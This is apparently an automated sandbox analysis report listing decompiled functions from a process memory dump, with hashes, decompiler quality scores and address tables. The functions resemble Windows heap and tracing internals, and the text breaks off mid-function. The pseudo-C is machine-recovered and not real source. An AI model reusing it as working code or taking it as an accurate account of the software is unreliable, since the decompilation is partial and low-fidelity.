0x053c9214
0x053c91e9
0x053c91e9
0x053c91ee
0x053c91f3
0x053c91f3
0x053c91f3
0x053c91e7
0x00000000
0x053c91db
0x053c9187
0x053c9168

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 792fb9b5700cbd36edbb886bed75001e31e6b7b73f93304624a70a9aa14816ab
Instruction ID: 4e6a234cbc1c1fa8ff4d388295f16d9a7505d12ad612435aec9c1f0d5b4aa16d
Opcode Fuzzy Hash: 792fb9b5700cbd36edbb886bed75001e31e6b7b73f93304624a70a9aa14816ab
Instruction Fuzzy Hash: F731A076A04284DFDB25DF68C48ABEDBFB6BB89310F1A818ED40567241C374BD80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 053E0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E053E0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x54bd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E053F9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0540B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05498A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E053F9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x54bb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x053e0055
0x053e005d
0x053e0062
0x053e006c
0x053e006f
0x053e0074
0x053e007a
0x053e007a
0x053e0080
0x053e0080
0x053e0087
0x053e008d
0x053e008f
0x053e0093
0x053e0095
0x053e009b
0x053e00f8
0x053e00fb
0x053e00fc
0x053e00ff
0x053e0108
0x053e0108
0x053e00a2
0x053e00a6
0x053e00b3
0x053e00bc
0x053e00c5
0x053e00ca
0x0542c01e
0x00000000
0x00000000
0x0542c02d
0x053e00d5
0x053e00d9
0x0542c03d
0x0542c046
0x0542c046
0x053e00df
0x053e00e2
0x053e00ea
0x053e00ef
0x053e00f2
0x053e00f6
0x053e0111
0x053e0117
0x053e0117
0x00000000
0x053e00f6
0x053e00d0
0x053e00d0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34ad48ca9f5f1ff1466e12af5718f56218559cbcbf6b149d8da0ddd8a1324927
Instruction ID: 5cc35a01570ecf574cedbbc88840dc6ed656f54545e9049c37c260185b25ebd5
Opcode Fuzzy Hash: 34ad48ca9f5f1ff1466e12af5718f56218559cbcbf6b149d8da0ddd8a1324927
Instruction Fuzzy Hash: E2319131601B14DFD726CF28C848B9AB7E6FF88714F14456DE59687B90EBB5AC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05446C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05446C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E053E7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x54b7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L053E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0540F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E053E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E05409AE0();
						_t23 = L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x05446c0a
0x05446c0f
0x05446c10
0x05446c13
0x05446c15
0x05446c19
0x05446c1c
0x05446c21
0x05446c28
0x05446c3a
0x05446c2a
0x05446c33
0x05446c33
0x05446c3f
0x05446c48
0x05446c4d
0x05446c60
0x05446c65
0x05446c69
0x05446c73
0x05446c79
0x05446c7f
0x05446c86
0x05446c90
0x05446c94
0x05446ca6
0x05446cb2
0x05446cbd
0x05446cbd
0x05446cc3
0x05446cc7
0x05446ccb
0x05446cd0
0x05446cd1
0x05446ce2
0x05446ce2
0x05446c69
0x05446ced

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95c0ad424d945e70fcf0118662497ae95ccd84fbae271d3399feeaf6949a7f55
Instruction ID: 99b31bb2cc5e76ede085122fb976287e189d6806bddc1419173ff02c7a94e184
Opcode Fuzzy Hash: 95c0ad424d945e70fcf0118662497ae95ccd84fbae271d3399feeaf6949a7f55
Instruction Fuzzy Hash: 1F21ABB1A00654AFDB25DB68D884EAAB7B8FF49740F1400AAF805D7791DA34ED50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 054090AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E054090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0541D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E053FE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L053E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0540F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E053FA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x054090af
0x054090b8
0x054090bb
0x054090bf
0x054090c2
0x054090c2
0x054090c8
0x054090cb
0x054090cd
0x054414d7
0x054414eb
0x054414eb
0x00000000
0x054414eb
0x054414db
0x054414e6
0x00000000
0x054414f2
0x054414e8
0x00000000
0x054414e8
0x054090d8
0x054090da
0x054090dd
0x054090e5
0x00000000
0x05409139
0x054090fa
0x054090fe
0x05409142
0x00000000
0x05409142
0x05409104
0x05409107
0x0540910b
0x05409110
0x05409118
0x05409147
0x05409148
0x0540914f
0x05409150
0x05409151
0x05409152
0x05409156
0x0540915d
0x05409160
0x05409168
0x0540916c
0x054091bc
0x054091be
0x00000000
0x054091be
0x0540916e
0x05409173
0x05409176
0x00000000
0x00000000
0x0540917c
0x05409180
0x054091b5
0x00000000
0x054091b5
0x05409182
0x05409185
0x05409189
0x00000000
0x00000000
0x0540918e
0x05409190
0x05409198
0x00000000
0x00000000
0x054091a0
0x00000000
0x054091ad
0x054091ad
0x054091b0
0x054091b1
0x00000000
0x05409185
0x0540911a
0x0540911c
0x0540911f
0x05409125
0x05409127
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 3bf25d1c27ac2a7c8c72582c82664d019a577b59b3c1533a3139ee846a15904a
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: EF218371A00204EFEB20DF59C444EAAF7F9EB48310F14847BE9859B251D370ED44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 053F3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E053F3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x54b84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x54b84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x54b84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0540AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0540FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x54b84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x54b84c4; // 0x0
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x053f3b89
0x053f3b96
0x053f3ba1
0x053f3bab
0x053f3bb5
0x053f3bb9
0x05436298
0x053f3bbf
0x053f3bc2
0x053f3bc3
0x053f3bc9
0x053f3bca
0x053f3bcc
0x053f3bcd
0x053f3bd4
0x053f3bd6
0x053f3bdb
0x053f3bea
0x053f3bf7
0x053f3bfb
0x053f3bff
0x053f3c09
0x053f3c0a
0x053f3c0b
0x053f3c0f
0x053f3c14
0x053f3c18
0x053f3c18
0x053f3bfb
0x053f3c1b
0x053f3c30
0x053f3c30
0x053f3c3d

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a1d41a1d6b3ba82aa3980f4cf4a58f43be333c0a48c7075b70ad725f0452550
Instruction ID: 67f3f7271925f64cbf94a63250c291d9b2ae2a3c3777baf2e193dc600e11f098
Opcode Fuzzy Hash: 1a1d41a1d6b3ba82aa3980f4cf4a58f43be333c0a48c7075b70ad725f0452550
Instruction Fuzzy Hash: A821C272600114AFD704DF98CD81FAABBBDFB44308F250569EA04AB251D771ED01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 05446CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05446CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E053E7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E053E7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x53a5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E053FF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E053FF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E05447016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L053E2400( &_v52);
								}
								_t21 = L053E2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x05446cfb
0x05446d00
0x05446d02
0x05446d06
0x05446d0a
0x05446d0e
0x05446d19
0x05446d2b
0x05446d1b
0x05446d24
0x05446d24
0x05446d33
0x05446d39
0x05446d46
0x05446d4f
0x05446d61
0x05446d51
0x05446d5a
0x05446d5a
0x05446d69
0x05446d6b
0x05446d6d
0x05446d6f
0x05446d6f
0x05446d74
0x05446d79
0x05446d7a
0x05446d7f
0x05446d82
0x05446d88
0x05446d89
0x05446d90
0x05446d94
0x05446da7
0x05446db1
0x05446db1
0x05446dbb
0x05446dbb
0x05446d90
0x05446d69
0x05446d46
0x05446dc6

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad5505b3b5027366911e17d7490270ae278fdead995da6780bc568e5939f0a8
Instruction ID: d1a5b2bb687b3fd9f0c8a35b92481276b00e405a28b8db49119dd5ae3df44e56
Opcode Fuzzy Hash: fad5505b3b5027366911e17d7490270ae278fdead995da6780bc568e5939f0a8
Instruction Fuzzy Hash: 9D21B0B26442549BE711DF29C948FABB7ECEF82640F050597B94187291EB34D909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0549070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0549070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E054907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0548AFDE( &_v8,  &_v12);
					E05491293(_t38, _v28, _t60);
					if(E053E7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E054814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0549071b
0x05490724
0x05490734
0x05490738
0x0549074b
0x0549074b
0x05490753
0x05490753
0x05490759
0x0549075d
0x05490774
0x05490779
0x0549077d
0x05490789
0x05490795
0x054907a7
0x05490797
0x054907a0
0x054907a0
0x054907af
0x054907c4
0x054907cd
0x054907cd
0x054907af
0x054907dc

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 11b6ec49dfae26dff68d8165050a289757f3f56c4f9191d790b8982b0c5d1515
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 7121F83A3042049FDB09DF18C889AABBBA5FBC4750F0485AEF9599B385D630D909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05447794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E05447794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x54b7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0540F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E053E7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E05409AE0();
					_t24 = L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x05447799
0x0544779a
0x0544779b
0x054477a3
0x054477ab
0x054477ae
0x054477b1
0x054477b1
0x054477bf
0x054477c4
0x054477c8
0x054477ce
0x054477d4
0x054477e0
0x054477e0
0x054477d6
0x054477d6
0x054477de
0x00000000
0x00000000
0x054477de
0x054477e5
0x054477f0
0x054477f3
0x054477f6
0x054477fd
0x05447800
0x0544780c
0x05447818
0x0544782b
0x0544781a
0x05447823
0x05447823
0x05447830
0x05447831
0x05447838
0x0544783d
0x0544783e
0x0544784f
0x0544784f
0x0544785a

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e76268ab9df0ee8f0db13f36c2c19bcdeea8ee2f615f74bd369eaeae5b0042
Instruction ID: 84b7ed00deb578ed15a78c481e3c89e94aaf49e3793b21761959a5c1dd1ccce3
Opcode Fuzzy Hash: 73e76268ab9df0ee8f0db13f36c2c19bcdeea8ee2f615f74bd369eaeae5b0042
Instruction Fuzzy Hash: B821A172600654ABD725DF69D884EABB7B9FF48340F10056EF50AD7790D734E901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 053EAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E053EAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E053E7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E053E7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E053E7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E053E7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E05447794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x053eae78
0x053eae7c
0x053eae7e
0x053eae81
0x053eae86
0x053eae8d
0x05432691
0x053eae93
0x053eae93
0x053eae93
0x053eae98
0x053eae9d
0x054326a2
0x054326b4
0x054326a4
0x054326ad
0x054326ad
0x054326b9
0x00000000
0x054326bb
0x00000000
0x054326bb
0x053eaea3
0x053eaea3
0x053eaea3
0x053eaeaa
0x054326c0
0x054326c9
0x054326c9
0x053eaeb3
0x054326d4
0x054326e1
0x00000000
0x00000000
0x054326e7
0x054326ee
0x054326f0
0x054326f9
0x054326f9
0x05432702
0x05432708
0x05432708
0x0543270b
0x0543270f
0x05432711
0x05432711
0x05432725
0x05432725
0x00000000
0x053eaeb9
0x053eaeb9
0x053eaebf
0x053eaebf
0x053eaeb3

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 73962d954f03a9cc3b02e3001f28ccc0cfecb5c87ae3e16aef619b527253af78
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 8321CF75609694DFDB26DB69C948B7677EAFF48240F0900E2DD048B7A2E7B4DC41C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 053FFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E053FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E053D76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x053ffd9b
0x053ffda0
0x053ffda1
0x053ffdab
0x053ffdad
0x053ffdb0
0x053ffdb8
0x053ffe0f
0x053ffde6
0x053ffde9
0x053ffdec
0x0543c0c0
0x053ffdfe
0x053ffe06
0x053ffe06
0x0543c0c8
0x053ffe2d
0x053ffe2d
0x00000000
0x053ffe2d
0x0543c0d1
0x0543c0e0
0x0543c0e5
0x0543c0e5
0x0543c0e8
0x00000000
0x0543c0e8
0x053ffdf4
0x00000000
0x00000000
0x053ffdf6
0x053ffdfa
0x053ffe1a
0x053ffe1f
0x053ffe1f
0x053ffdfc
0x00000000
0x053ffdfc
0x053ffdcc
0x053ffdd0
0x053ffe26
0x00000000
0x053ffe26
0x053ffdd8
0x053ffddb
0x053ffddd
0x053ffde0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 61407f044e5ee813b5f3d0e66f47d76249996111fe16807d80b659384d939180
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: A2217972A04A40DBC735CF49D540E66F7EAFB94B10F24816EEA4A87A65D770EC00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 053FB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E053FB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
